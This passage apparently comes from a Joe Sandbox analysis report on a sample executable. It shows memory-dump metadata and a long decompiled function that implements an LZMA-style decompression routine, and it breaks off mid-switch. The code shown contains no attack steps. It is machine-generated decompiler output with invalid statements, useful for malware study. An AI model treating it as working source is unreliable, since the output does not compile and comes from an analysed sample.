                                      0x004074e5
                                      0x004074e8
                                      0x004074ee
                                      0x00407507
                                      0x0040750a
                                      0x0040750d
                                      0x00407510
                                      0x00407514
                                      0x00407516
                                      0x00407517
                                      0x0040751a
                                      0x004074f0
                                      0x004074f0
                                      0x004074f8
                                      0x004074fd
                                      0x004074ff
                                      0x00407502
                                      0x00407502
                                      0x00407524
                                      0x00000000
                                      0x00407526
                                      0x00000000
                                      0x00407526
                                      0x00407524
                                      0x00000000
                                      0x00407399

                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                      • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                      • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                      • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 98%
                                      			E004070AB() {
                                      				unsigned short _t532;
                                      				signed int _t533;
                                      				void _t534;
                                      				void* _t535;
                                      				signed int _t536;
                                      				signed int _t565;
                                      				signed int _t568;
                                      				signed int _t589;
                                      				signed int* _t606;
                                      				void* _t613;
                                      
                                      				L0:
                                      				while(1) {
                                      					L0:
                                      					if( *(_t613 - 0x40) != 0) {
                                      						L89:
                                      						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                      						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                      						L69:
                                      						_t606 =  *(_t613 - 0x58);
                                      						 *(_t613 - 0x84) = 0x12;
                                      						L132:
                                      						 *(_t613 - 0x54) = _t606;
                                      						L133:
                                      						_t532 =  *_t606;
                                      						_t589 = _t532 & 0x0000ffff;
                                      						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                      						if( *(_t613 - 0xc) >= _t565) {
                                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                      							 *(_t613 - 0x40) = 1;
                                      							_t533 = _t532 - (_t532 >> 5);
                                      							 *_t606 = _t533;
                                      						} else {
                                      							 *(_t613 - 0x10) = _t565;
                                      							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                      							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                      						}
                                      						if( *(_t613 - 0x10) >= 0x1000000) {
                                      							L139:
                                      							_t534 =  *(_t613 - 0x84);
                                      							L140:
                                      							 *(_t613 - 0x88) = _t534;
                                      							goto L1;
                                      						} else {
                                      							L137:
                                      							if( *(_t613 - 0x6c) == 0) {
                                      								 *(_t613 - 0x88) = 5;
                                      								goto L170;
                                      							}
                                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                      							goto L139;
                                      						}
                                      					} else {
                                      						if( *(__ebp - 0x60) == 0) {
                                      							L171:
                                      							_t536 = _t535 | 0xffffffff;
                                      							L172:
                                      							return _t536;
                                      						}
                                      						__eax = 0;
                                      						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                      						0 | _t258 = _t258 + _t258 + 9;
                                      						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                      						L75:
                                      						if( *(__ebp - 0x64) == 0) {
                                      							 *(__ebp - 0x88) = 0x1b;
                                      							L170:
                                      							_t568 = 0x22;
                                      							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                      							_t536 = 0;
                                      							goto L172;
                                      						}
                                      						__eax =  *(__ebp - 0x14);
                                      						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                      						if(__eax >=  *(__ebp - 0x74)) {
                                      							__eax = __eax +  *(__ebp - 0x74);
                                      						}
                                      						__edx =  *(__ebp - 8);
                                      						__cl =  *(__eax + __edx);
                                      						__eax =  *(__ebp - 0x14);
                                      						 *(__ebp - 0x5c) = __cl;
                                      						 *(__eax + __edx) = __cl;
                                      						__eax = __eax + 1;
                                      						__edx = 0;
                                      						_t274 = __eax %  *(__ebp - 0x74);
                                      						__eax = __eax /  *(__ebp - 0x74);
                                      						__edx = _t274;
                                      						__eax =  *(__ebp - 0x68);
                                      						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                      						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                      						_t283 = __ebp - 0x64;
                                      						 *_t283 =  *(__ebp - 0x64) - 1;
                                      						 *( *(__ebp - 0x68)) = __cl;
                                      						L79:
                                      						 *(__ebp - 0x14) = __edx;
                                      						L80:
                                      						 *(__ebp - 0x88) = 2;
                                      					}
                                      					L1:
                                      					_t535 =  *(_t613 - 0x88);
                                      					if(_t535 > 0x1c) {
                                      						goto L171;
                                      					}
                                      					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
                                      						case 0:
                                      							if( *(_t613 - 0x6c) == 0) {
                                      								goto L170;
                                      							}
                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                      							_t535 =  *( *(_t613 - 0x70));
                                      							if(_t535 > 0xe1) {
                                      								goto L171;
                                      							}
                                      							_t539 = _t535 & 0x000000ff;
                                      							_push(0x2d);
                                      							asm("cdq");
                                      							_pop(_t570);
                                      							_push(9);
                                      							_pop(_t571);
                                      							_t609 = _t539 / _t570;
                                      							_t541 = _t539 % _t570 & 0x000000ff;
                                      							asm("cdq");
                                      							_t604 = _t541 % _t571 & 0x000000ff;
                                      							 *(_t613 - 0x3c) = _t604;
                                      							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                      							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                      							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                      							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                      								L10:
                                      								if(_t612 == 0) {
                                      									L12:
                                      									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                      									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                      									goto L15;
                                      								} else {
                                      									goto L11;
                                      								}
                                      								do {
                                      									L11:
                                      									_t612 = _t612 - 1;
                                      									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                      								} while (_t612 != 0);
                                      								goto L12;
                                      							}
                                      							if( *(_t613 - 4) != 0) {
                                      								GlobalFree( *(_t613 - 4));
                                      							}
                                      							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                      							 *(_t613 - 4) = _t535;
                                      							if(_t535 == 0) {
                                      								goto L171;
                                      							} else {
                                      								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                      								goto L10;
                                      							}
                                      						case 1:
                                      							L13:
                                      							__eflags =  *(_t613 - 0x6c);
                                      							if( *(_t613 - 0x6c) == 0) {
                                      								 *(_t613 - 0x88) = 1;
                                      								goto L170;
                                      							}
                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                      							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                      							_t45 = _t613 - 0x48;
                                      							 *_t45 =  *(_t613 - 0x48) + 1;
                                      							__eflags =  *_t45;
                                      							L15:
                                      							if( *(_t613 - 0x48) < 4) {
                                      								goto L13;
                                      							}
                                      							_t547 =  *(_t613 - 0x40);
                                      							if(_t547 ==  *(_t613 - 0x74)) {
                                      								L20:
                                      								 *(_t613 - 0x48) = 5;
                                      								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                      								goto L23;
                                      							}
                                      							 *(_t613 - 0x74) = _t547;
                                      							if( *(_t613 - 8) != 0) {
                                      								GlobalFree( *(_t613 - 8));
                                      							}
                                      							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                      							 *(_t613 - 8) = _t535;
                                      							if(_t535 == 0) {
                                      								goto L171;
                                      							} else {
                                      								goto L20;
                                      							}
                                      						case 2:
                                      							L24:
                                      							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                      							 *(_t613 - 0x84) = 6;
                                      							 *(_t613 - 0x4c) = _t554;
                                      							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                      							goto L132;
                                      						case 3:
                                      							L21:
                                      							__eflags =  *(_t613 - 0x6c);
                                      							if( *(_t613 - 0x6c) == 0) {
                                      								 *(_t613 - 0x88) = 3;
                                      								goto L170;
                                      							}
                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                      							_t67 = _t613 - 0x70;
                                      							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                      							__eflags =  *_t67;
                                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                      							L23:
                                      							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                      							if( *(_t613 - 0x48) != 0) {
                                      								goto L21;
                                      							}
                                      							goto L24;
                                      						case 4:
                                      							goto L133;
                                      						case 5:
                                      							goto L137;
                                      						case 6:
                                      							__edx = 0;
                                      							__eflags =  *(__ebp - 0x40);
                                      							if( *(__ebp - 0x40) != 0) {
                                      								__eax =  *(__ebp - 4);
                                      								__ecx =  *(__ebp - 0x38);
                                      								 *(__ebp - 0x34) = 1;
                                      								 *(__ebp - 0x84) = 7;
                                      								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                      								goto L132;
                                      							}
                                      							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                      							__esi =  *(__ebp - 0x60);
                                      							__cl = 8;
                                      							__cl = 8 -  *(__ebp - 0x3c);
                                      							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                      							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                      							__ecx =  *(__ebp - 0x3c);
                                      							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                      							__ecx =  *(__ebp - 4);
                                      							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                      							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                      							__eflags =  *(__ebp - 0x38) - 4;
                                      							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                      							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                      							if( *(__ebp - 0x38) >= 4) {
                                      								__eflags =  *(__ebp - 0x38) - 0xa;
                                      								if( *(__ebp - 0x38) >= 0xa) {
                                      									_t98 = __ebp - 0x38;
                                      									 *_t98 =  *(__ebp - 0x38) - 6;
                                      									__eflags =  *_t98;
                                      								} else {
                                      									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                      								}
                                      							} else {
                                      								 *(__ebp - 0x38) = 0;
                                      							}
                                      							__eflags =  *(__ebp - 0x34) - __edx;
                                      							if( *(__ebp - 0x34) == __edx) {
                                      								__ebx = 0;
                                      								__ebx = 1;
                                      								goto L61;
                                      							} else {
                                      								__eax =  *(__ebp - 0x14);
                                      								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                      								__eflags = __eax -  *(__ebp - 0x74);
                                      								if(__eax >=  *(__ebp - 0x74)) {
                                      									__eax = __eax +  *(__ebp - 0x74);
                                      									__eflags = __eax;
                                      								}
                                      								__ecx =  *(__ebp - 8);
                                      								__ebx = 0;
                                      								__ebx = 1;
                                      								__al =  *((intOrPtr*)(__eax + __ecx));
                                      								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                      								goto L41;
                                      							}
                                      						case 7:
                                      							__eflags =  *(__ebp - 0x40) - 1;
                                      							if( *(__ebp - 0x40) != 1) {
                                      								__eax =  *(__ebp - 0x24);
                                      								 *(__ebp - 0x80) = 0x16;
                                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                      								__eax =  *(__ebp - 0x28);
                                      								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                      								__eax =  *(__ebp - 0x2c);
                                      								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                      								__eax = 0;
                                      								__eflags =  *(__ebp - 0x38) - 7;
                                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                      								__al = __al & 0x000000fd;
                                      								__eax = (__eflags >= 0) - 1 + 0xa;
                                      								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                      								__eax =  *(__ebp - 4);
                                      								__eax =  *(__ebp - 4) + 0x664;
                                      								__eflags = __eax;
                                      								 *(__ebp - 0x58) = __eax;
                                      								goto L69;
                                      							}
                                      							__eax =  *(__ebp - 4);
                                      							__ecx =  *(__ebp - 0x38);
                                      							 *(__ebp - 0x84) = 8;
                                      							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                      							goto L132;
                                      						case 8:
                                      							__eflags =  *(__ebp - 0x40);
                                      							if( *(__ebp - 0x40) != 0) {
                                      								__eax =  *(__ebp - 4);
                                      								__ecx =  *(__ebp - 0x38);
                                      								 *(__ebp - 0x84) = 0xa;
                                      								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                      							} else {
                                      								__eax =  *(__ebp - 0x38);
                                      								__ecx =  *(__ebp - 4);
                                      								__eax =  *(__ebp - 0x38) + 0xf;
                                      								 *(__ebp - 0x84) = 9;
                                      								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                      								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                      							}
                                      							goto L132;
                                      						case 9:
                                      							goto L0;
                                      						case 0xa:
                                      							__eflags =  *(__ebp - 0x40);
                                      							if( *(__ebp - 0x40) != 0) {
                                      								__eax =  *(__ebp - 4);
                                      								__ecx =  *(__ebp - 0x38);
                                      								 *(__ebp - 0x84) = 0xb;
                                      								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                      								goto L132;
                                      							}
                                      							__eax =  *(__ebp - 0x28);
                                      							goto L88;
                                      						case 0xb:
                                      							__eflags =  *(__ebp - 0x40);
                                      							if( *(__ebp - 0x40) != 0) {
                                      								__ecx =  *(__ebp - 0x24);
                                      								__eax =  *(__ebp - 0x20);
                                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                      							} else {
                                      								__eax =  *(__ebp - 0x24);
                                      							}
                                      							__ecx =  *(__ebp - 0x28);
                                      							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                      							L88:
                                      							__ecx =  *(__ebp - 0x2c);
                                      							 *(__ebp - 0x2c) = __eax;
                                      							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                      							goto L89;
                                      						case 0xc:
                                      							L99:
                                      							__eflags =  *(__ebp - 0x6c);
                                      							if( *(__ebp - 0x6c) == 0) {
                                      								 *(__ebp - 0x88) = 0xc;
                                      								goto L170;
                                      							}
                                      							__ecx =  *(__ebp - 0x70);
                                      							__eax =  *(__ebp - 0xc);
                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							_t334 = __ebp - 0x70;
                                      							 *_t334 =  *(__ebp - 0x70) + 1;
                                      							__eflags =  *_t334;
                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							__eax =  *(__ebp - 0x2c);
                                      							goto L101;
                                      						case 0xd:
                                      							L37:
                                      							__eflags =  *(__ebp - 0x6c);
                                      							if( *(__ebp - 0x6c) == 0) {
                                      								 *(__ebp - 0x88) = 0xd;
                                      								goto L170;
                                      							}
                                      							__ecx =  *(__ebp - 0x70);
                                      							__eax =  *(__ebp - 0xc);
                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							_t122 = __ebp - 0x70;
                                      							 *_t122 =  *(__ebp - 0x70) + 1;
                                      							__eflags =  *_t122;
                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							L39:
                                      							__eax =  *(__ebp - 0x40);
                                      							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                      							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                      								goto L48;
                                      							}
                                      							__eflags = __ebx - 0x100;
                                      							if(__ebx >= 0x100) {
                                      								goto L54;
                                      							}
                                      							L41:
                                      							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                      							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                      							__ecx =  *(__ebp - 0x58);
                                      							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                      							 *(__ebp - 0x48) = __eax;
                                      							__eax = __eax + 1;
                                      							__eax = __eax << 8;
                                      							__eax = __eax + __ebx;
                                      							__esi =  *(__ebp - 0x58) + __eax * 2;
                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                      							__ax =  *__esi;
                                      							 *(__ebp - 0x54) = __esi;
                                      							__edx = __ax & 0x0000ffff;
                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                      							__eflags =  *(__ebp - 0xc) - __ecx;
                                      							if( *(__ebp - 0xc) >= __ecx) {
                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      								__cx = __ax;
                                      								 *(__ebp - 0x40) = 1;
                                      								__cx = __ax >> 5;
                                      								__eflags = __eax;
                                      								__ebx = __ebx + __ebx + 1;
                                      								 *__esi = __ax;
                                      							} else {
                                      								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                      								 *(__ebp - 0x10) = __ecx;
                                      								0x800 = 0x800 - __edx;
                                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                      								__ebx = __ebx + __ebx;
                                      								 *__esi = __cx;
                                      							}
                                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      							 *(__ebp - 0x44) = __ebx;
                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                      								goto L39;
                                      							} else {
                                      								goto L37;
                                      							}
                                      						case 0xe:
                                      							L46:
                                      							__eflags =  *(__ebp - 0x6c);
                                      							if( *(__ebp - 0x6c) == 0) {
                                      								 *(__ebp - 0x88) = 0xe;
                                      								goto L170;
                                      							}
                                      							__ecx =  *(__ebp - 0x70);
                                      							__eax =  *(__ebp - 0xc);
                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							_t156 = __ebp - 0x70;
                                      							 *_t156 =  *(__ebp - 0x70) + 1;
                                      							__eflags =  *_t156;
                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							while(1) {
                                      								L48:
                                      								__eflags = __ebx - 0x100;
                                      								if(__ebx >= 0x100) {
                                      									break;
                                      								}
                                      								__eax =  *(__ebp - 0x58);
                                      								__edx = __ebx + __ebx;
                                      								__ecx =  *(__ebp - 0x10);
                                      								__esi = __edx + __eax;
                                      								__ecx =  *(__ebp - 0x10) >> 0xb;
                                      								__ax =  *__esi;
                                      								 *(__ebp - 0x54) = __esi;
                                      								__edi = __ax & 0x0000ffff;
                                      								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                      								__eflags =  *(__ebp - 0xc) - __ecx;
                                      								if( *(__ebp - 0xc) >= __ecx) {
                                      									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      									__cx = __ax;
                                      									_t170 = __edx + 1; // 0x1
                                      									__ebx = _t170;
                                      									__cx = __ax >> 5;
                                      									__eflags = __eax;
                                      									 *__esi = __ax;
                                      								} else {
                                      									 *(__ebp - 0x10) = __ecx;
                                      									0x800 = 0x800 - __edi;
                                      									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                      									__ebx = __ebx + __ebx;
                                      									 *__esi = __cx;
                                      								}
                                      								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      								 *(__ebp - 0x44) = __ebx;
                                      								if( *(__ebp - 0x10) >= 0x1000000) {
                                      									continue;
                                      								} else {
                                      									goto L46;
                                      								}
                                      							}
                                      							L54:
                                      							_t173 = __ebp - 0x34;
                                      							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                      							__eflags =  *_t173;
                                      							goto L55;
                                      						case 0xf:
                                      							L58:
                                      							__eflags =  *(__ebp - 0x6c);
                                      							if( *(__ebp - 0x6c) == 0) {
                                      								 *(__ebp - 0x88) = 0xf;
                                      								goto L170;
                                      							}
                                      							__ecx =  *(__ebp - 0x70);
                                      							__eax =  *(__ebp - 0xc);
                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							_t203 = __ebp - 0x70;
                                      							 *_t203 =  *(__ebp - 0x70) + 1;
                                      							__eflags =  *_t203;
                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							L60:
                                      							__eflags = __ebx - 0x100;
                                      							if(__ebx >= 0x100) {
                                      								L55:
                                      								__al =  *(__ebp - 0x44);
                                      								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                      								goto L56;
                                      							}
                                      							L61:
                                      							__eax =  *(__ebp - 0x58);
                                      							__edx = __ebx + __ebx;
                                      							__ecx =  *(__ebp - 0x10);
                                      							__esi = __edx + __eax;
                                      							__ecx =  *(__ebp - 0x10) >> 0xb;
                                      							__ax =  *__esi;
                                      							 *(__ebp - 0x54) = __esi;
                                      							__edi = __ax & 0x0000ffff;
                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                      							__eflags =  *(__ebp - 0xc) - __ecx;
                                      							if( *(__ebp - 0xc) >= __ecx) {
                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      								__cx = __ax;
                                      								_t217 = __edx + 1; // 0x1
                                      								__ebx = _t217;
                                      								__cx = __ax >> 5;
                                      								__eflags = __eax;
                                      								 *__esi = __ax;
                                      							} else {
                                      								 *(__ebp - 0x10) = __ecx;
                                      								0x800 = 0x800 - __edi;
                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                      								__ebx = __ebx + __ebx;
                                      								 *__esi = __cx;
                                      							}
                                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      							 *(__ebp - 0x44) = __ebx;
                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                      								goto L60;
                                      							} else {
                                      								goto L58;
                                      							}
                                      						case 0x10:
                                      							L109:
                                      							__eflags =  *(__ebp - 0x6c);
                                      							if( *(__ebp - 0x6c) == 0) {
                                      								 *(__ebp - 0x88) = 0x10;
                                      								goto L170;
                                      							}
                                      							__ecx =  *(__ebp - 0x70);
                                      							__eax =  *(__ebp - 0xc);
                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							_t365 = __ebp - 0x70;
                                      							 *_t365 =  *(__ebp - 0x70) + 1;
                                      							__eflags =  *_t365;
                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							goto L111;
                                      						case 0x11:
                                      							goto L69;
                                      						case 0x12:
                                      							__eflags =  *(__ebp - 0x40);
                                      							if( *(__ebp - 0x40) != 0) {
                                      								__eax =  *(__ebp - 0x58);
                                      								 *(__ebp - 0x84) = 0x13;
                                      								__esi =  *(__ebp - 0x58) + 2;
                                      								goto L132;
                                      							}
                                      							__eax =  *(__ebp - 0x4c);
                                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                      							__ecx =  *(__ebp - 0x58);
                                      							__eax =  *(__ebp - 0x4c) << 4;
                                      							__eflags = __eax;
                                      							__eax =  *(__ebp - 0x58) + __eax + 4;
                                      							goto L130;
                                      						case 0x13:
                                      							__eflags =  *(__ebp - 0x40);
                                      							if( *(__ebp - 0x40) != 0) {
                                      								_t469 = __ebp - 0x58;
                                      								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                      								__eflags =  *_t469;
                                      								 *(__ebp - 0x30) = 0x10;
                                      								 *(__ebp - 0x40) = 8;
                                      								L144:
                                      								 *(__ebp - 0x7c) = 0x14;
                                      								goto L145;
                                      							}
                                      							__eax =  *(__ebp - 0x4c);
                                      							__ecx =  *(__ebp - 0x58);
                                      							__eax =  *(__ebp - 0x4c) << 4;
                                      							 *(__ebp - 0x30) = 8;
                                      							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                      							L130:
                                      							 *(__ebp - 0x58) = __eax;
                                      							 *(__ebp - 0x40) = 3;
                                      							goto L144;
                                      						case 0x14:
                                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                      							__eax =  *(__ebp - 0x80);
                                      							goto L140;
                                      						case 0x15:
                                      							__eax = 0;
                                      							__eflags =  *(__ebp - 0x38) - 7;
                                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                      							__al = __al & 0x000000fd;
                                      							__eax = (__eflags >= 0) - 1 + 0xb;
                                      							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                      							goto L120;
                                      						case 0x16:
